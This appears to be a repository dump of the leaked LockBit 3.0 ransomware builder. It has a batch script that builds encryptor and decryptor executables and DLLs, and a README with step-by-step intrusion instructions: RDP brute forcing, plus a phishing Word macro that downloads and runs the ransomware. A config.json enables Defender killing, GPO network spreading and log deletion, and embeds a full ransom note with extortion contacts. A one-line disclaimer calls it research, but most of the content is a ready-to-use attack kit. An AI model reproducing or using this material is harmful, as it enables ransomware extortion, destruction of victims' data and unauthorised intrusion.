├── Build.bat ├── README.md ├── builder.exe ├── config.json └── keygen.exe /Build.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | echo Press any key to generate the LockBit files (will overwrite existing files)... 3 | pause >nul 4 | IF exist Build (ERASE /F /Q Build\*.*) ELSE (mkdir Build) 5 | echo (1/7) Generating keys 6 | keygen -path Build -pubkey pub.key -privkey priv.key 7 | echo (2/7) Building decryptor 8 | builder -type dec -privkey Build\priv.key -config config.json -ofile Build\LB3Decryptor.exe 9 | echo (3/7) Building ransomware executable 10 | builder -type enc -exe -pubkey Build\pub.key -config config.json -ofile Build\LB3.exe 11 | echo (4/7) Building ransomware executable that requires password 12 | builder -type enc -exe -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_pass.exe 13 | echo (5/7) Building ransomware DLL 14 | builder -type enc -dll -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32.dll 15 | echo (6/7) Building ransomware DLL that requires password 16 | builder -type enc -dll -pass -pubkey Build\pub.key -config config.json -ofile Build\LB3_Rundll32_pass.dll 17 | echo (7/7) Building reflective DLL 18 | builder -type enc -ref -pubkey Build\pub.key -config config.json -ofile Build\LB3_ReflectiveDll_DllMain.dll 19 | echo Done. 20 | pause >nul 21 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # LockBit 2 | LockBit 3.0, also known as “LockBit Black,” is more modular and evasive than its previous versions and shares similarities with Blackmatter and Blackcat ransomware. 3 | 4 | ## Initial Access 5 | Anyone deploying LockBit 3.0 ransomware gains initial access to victim networks via remote desktop protocol (RDP) exploitation, drive-by compromise, phishing campaigns, abuse of valid accounts, and exploitation of public-facing applications. 6 | 7 | ## Execution and Infiltration 8 | During the malware routine, if privileges are not sufficient, LockBit 3.0 attempts to escalate to the required privileges. LockBit 3.0 performs functions such as: 9 | 10 | * Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices 11 | * Terminating processes and services 12 | * Launching commands 13 | * Enabling automatic logon for persistence and privilege escalation 14 | * Deleting log files, files in the recycle bin folder, and shadow copies residing on disk 15 | 16 | After files are encrypted, LockBit 3.0 drops a ransom note with the new filename .README.txt and changes the host’s wallpaper and icons to LockBit 3.0 branding. If needed, LockBit 3.0 will send encrypted host and bot information to a command and control (C2) server. 17 | 18 | ## Mitigations 19 | * Have an anti-virus software separate from the built-in Windows defender installed. 20 | * Keep all systems, software, and firmware up to date 21 | * Disable unused ports 22 | * Take backups and keep them safe 23 | 24 | ## Testing on Authorized Systems 25 | To test LockBit 3.0 on a system, you must first generate the files required before accessing the system. The batch file in this repo can automate this process. 26 | 27 | Once that has been done, there are several different methods for accessing the system and many are included in guides online. The process for a couple of methods will be listed here. 28 | 29 | ### Accessing a System with RDP 30 | This method will not work if the target does not have RDP enabled or does not have the port forwarded on the network. Make sure this is done beforehand. Brute forcing the password also takes a significant amount of time and if the password is good enough, it may be near impossible. 31 | 1. Know the IP address of your target or obtain it with NMAP 32 | 2. Make sure the port 3389 is open on the target's network with NMAP 33 | 3. Use a brute force tool such as Crowbar or Hydra 34 | 4. Connect using a client of your choice 35 | 5. Copy the LockBit 3.0 files to the remote machine using your client, a cloud service, FTP, or any other method of your choice 36 | 6. Execute Lockbit 3.0 37 | 38 | ### Accessing a System with a Phishing Scheme 39 | In this case, an email will be sent with a job application. When the job application is opened (using Microsoft Word) and the button to start editing it is pressed, LockBit 3.0 is downloaded and executed. There is a guide online, but here are some tips: 40 | 1. In Word, enter dev mode with `Alt+F8` 41 | 2. The macro in the guide works, but only for an executable already in the path. An easy way to copy and execute LockBit 3.0 is to download and run the executable in the macro. Here is a version of the macro that implements this: 42 | ``` 43 | Sub Document_Open() 44 | 45 | dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") 46 | dim bStrm: Set bStrm = createobject("Adodb.Stream") 47 | xHttp.Open "GET", "http://example.com/LB3.exe", False 48 | xHttp.Send 49 | 50 | with bStrm 51 | .type = 1 '//binary 52 | .open 53 | .write xHttp.responseBody 54 | .savetofile "c:\temp\LB3.exe", 2 '//overwrite 55 | end with 56 | 57 | CreateObject("WScript.Shell").Run "c:\temp\LB3.exe" 58 | 59 | End Sub 60 | ``` 61 | 3. Follow everything else in the guide to create the final document 62 | 4. Send an email containing the document, and when the user opens and presses "Enable Editing", it should execute LockBit 3.0 63 | 64 | ## [#StopRansomware: LockBit 3.0](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a) 65 | 66 | **This project is only for the investigation of the ransomware and how it can be mitigated. It is not to be used to attack systems without authorization.** 67 | 68 | “#Stopransomware: LockBit 3.0: CISA.” Cybersecurity and Infrastructure Security Agency CISA, 15 Mar. 2023, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a. 69 | 70 | -------------------------------------------------------------------------------- /builder.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tennessene/LockBit/2f5cfff7b610d4ac47af479997389d32589fe48c/builder.exe -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "bot": { 3 | "uid": "00000000000000000000000000000000", 4 | "key": "00000000000000000000000000000000" 5 | }, 6 | "config": { 7 | "settings": { 8 | "encrypt_mode": "auto", 9 | "encrypt_filename": false, 10 | "impersonation": true, 11 | "skip_hidden_folders": false, 12 | "language_check": false, 13 | "local_disks": true, 14 | "network_shares": true, 15 | "kill_processes": true, 16 | "kill_services": true, 17 | "running_one": true, 18 | "print_note": true, 19 | "set_wallpaper": true, 20 | "set_icons": true, 21 | "send_report": false, 22 | "self_destruct": true, 23 | "kill_defender": true, 24 | "wipe_freespace": false, 25 | "psexec_netspread": false, 26 | "gpo_netspread": true, 27 | "gpo_ps_update": true, 28 | "shutdown_system": false, 29 | "delete_eventlogs": true, 30 | "delete_gpo_delay": 1 31 | }, 32 | "white_folders": "$recycle.bin;config.msi;$windows.~bt;$windows.~ws;windows;boot;program files;program files (x86);programdata;system volume information;tor browser;windows.old;intel;msocache;perflogs;x64dbg;public;all users;default;microsoft", 33 | "white_files": "autorun.inf;boot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntldr;ntuser.dat;ntuser.dat.log;ntuser.ini;thumbs.db;GDIPFONTCACHEV1.DAT;d3d9caps.dat", 34 | "white_extens": "386;adv;ani;bat;bin;cab;cmd;com;cpl;cur;deskthemepack;diagcab;diagcfg;diagpkg;dll;drv;exe;hlp;icl;icns;ico;ics;idx;ldf;lnk;mod;mpa;msc;msp;msstyles;msu;nls;nomedia;ocx;prf;ps1;rom;rtp;scr;shs;spl;sys;theme;themepack;wpx;lock;key;hta;msi;pdb;search-ms", 35 | "white_hosts": "WS2019", 36 | "kill_processes": "sql;oracle;ocssd;dbsnmp;synctime;agntsvc;isqlplussvc;xfssvccon;mydesktopservice;ocautoupds;encsvc;firefox;tbirdconfig;mydesktopqos;ocomm;dbeng50;sqbcoreservice;excel;infopath;msaccess;mspub;onenote;outlook;powerpnt;steam;thebat;thunderbird;visio;winword;wordpad;notepad;calc;wuauclt;onedrive", 37 | "kill_services": "vss;sql;svc$;memtas;mepocs;msexchange;sophos;veeam;backup;GxVss;GxBlr;GxFWD;GxCVD;GxCIMgr", 38 | "gate_urls": "https://test.white-datasheet.com/;http://test.white-datasheet.com/", 39 | "impers_accounts": "ad.lab:Qwerty!;Administrator:123QWEqwe!@#;Admin2:P@ssw0rd;Administrator:P@ssw0rd;Administrator:Qwerty!;Administrator:123QWEqwe;Administrator:123QWEqweqwe", 40 | "note": " 41 | ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~ 42 | 43 | >>>> Your data are stolen and encrypted 44 | 45 | The data will be published on TOR website if you do not pay the ransom 46 | 47 | Links for Tor Browser: 48 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion 49 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 50 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 51 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 52 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion 53 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion 54 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 55 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion 56 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion 57 | 58 | Links for the normal browser 59 | http://lockbitapt.uz 60 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly 61 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly 62 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 63 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 64 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly 65 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly 66 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 67 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly 68 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly 69 | 70 | 71 | >>>> What guarantees that we will not deceive you? 72 | 73 | We are not a politically motivated group and we do not need anything other than your money. 74 | 75 | If you pay, we will provide you the programs for decryption and we will delete your data. 76 | Life is too short to be sad. Be not sad, money, it is only paper. 77 | 78 | If we do not give you decrypters, or we do not delete your data after payment, then nobody will pay us in the future. 79 | Therefore to us our reputation is very important. We attack the companies worldwide and there is no dissatisfied victim after payment. 80 | 81 | You can obtain information about us on twitter https://twitter.com/hashtag/lockbit?f=live 82 | 83 | 84 | >>>> You need contact us and decrypt one file for free on these TOR sites with your personal DECRYPTION ID 85 | 86 | Download and install TOR Browser https://www.torproject.org/ 87 | Write to a chat and wait for the answer, we will always answer you. 88 | Sometimes you will need to wait for our answer because we attack many companies. 89 | 90 | Links for Tor Browser: 91 | http://lockbitsupt7nr3fa6e7xyb73lk6bw6rcneqhoyblniiabj4uwvzapqd.onion 92 | http://lockbitsupuhswh4izvoucoxsbnotkmgq6durg7kficg6u33zfvq3oyd.onion 93 | http://lockbitsupn2h6be2cnqpvncyhj4rgmnwn44633hnzzmtxdvjoqlp7yd.onion 94 | 95 | Link for the normal browser 96 | http://lockbitsupp.uz 97 | 98 | If you do not get an answer in the chat room for a long time, the site does not work and in any other emergency, you can contact us in jabber or tox. 99 | 100 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 101 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 102 | 103 | >>>> Your personal DECRYPTION ID: B7568014A48684D6D525F3F3722638C4 104 | 105 | >>>> Warning! Do not DELETE or MODIFY any files, it can lead to recovery problems! 106 | 107 | >>>> Warning! If you do not pay the ransom we will attack your company repeatedly again! 108 | 109 | 110 | >>>> Advertisement 111 | 112 | Would you like to earn millions of dollars $$$ ? 113 | 114 | Our company acquire access to networks of various companies, as well as insider information that can help you steal the most valuable data of any company. 115 | You can provide us accounting data for the access to any company, for example, login and password to RDP, VPN, corporate email, etc. 116 | Open our letter at your email. Launch the provided virus on any computer in your company. 117 | 118 | You can do it both using your work computer or the computer of any other employee in order to divert suspicion of being in collusion with us. 119 | 120 | Companies pay us the foreclosure for the decryption of files and prevention of data leak. 121 | 122 | You can contact us using Tox messenger without registration and SMS https://tox.chat/download.html. 123 | Using Tox messenger, we will never know your real name, it means your privacy is guaranteed. 124 | 125 | If you want to contact us, write in jabber or tox. 126 | 127 | Tox ID LockBitSupp: 3085B89A0C515D2FB124D645906F5D3DA5CB97CEBEA975959AE4F95302A04E1D709C3C4AE9B7 128 | XMPP (Jabber) Support: 598954663666452@exploit.im 365473292355268@thesecure.biz 129 | 130 | If this contact is expired, and we do not respond you, look for the relevant contact data on our website via Tor or Brave browser 131 | 132 | Links for Tor Browser: 133 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion 134 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion 135 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion 136 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion 137 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion 138 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion 139 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion 140 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion 141 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion 142 | 143 | 144 | Links for the normal browser 145 | http://lockbitapt.uz 146 | http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly 147 | http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion.ly 148 | http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion.ly 149 | http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion.ly 150 | http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion.ly 151 | http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion.ly 152 | http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion.ly 153 | http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion.ly 154 | http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.ly" 155 | } 156 | } -------------------------------------------------------------------------------- /keygen.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Tennessene/LockBit/2f5cfff7b610d4ac47af479997389d32589fe48c/keygen.exe --------------------------------------------------------------------------------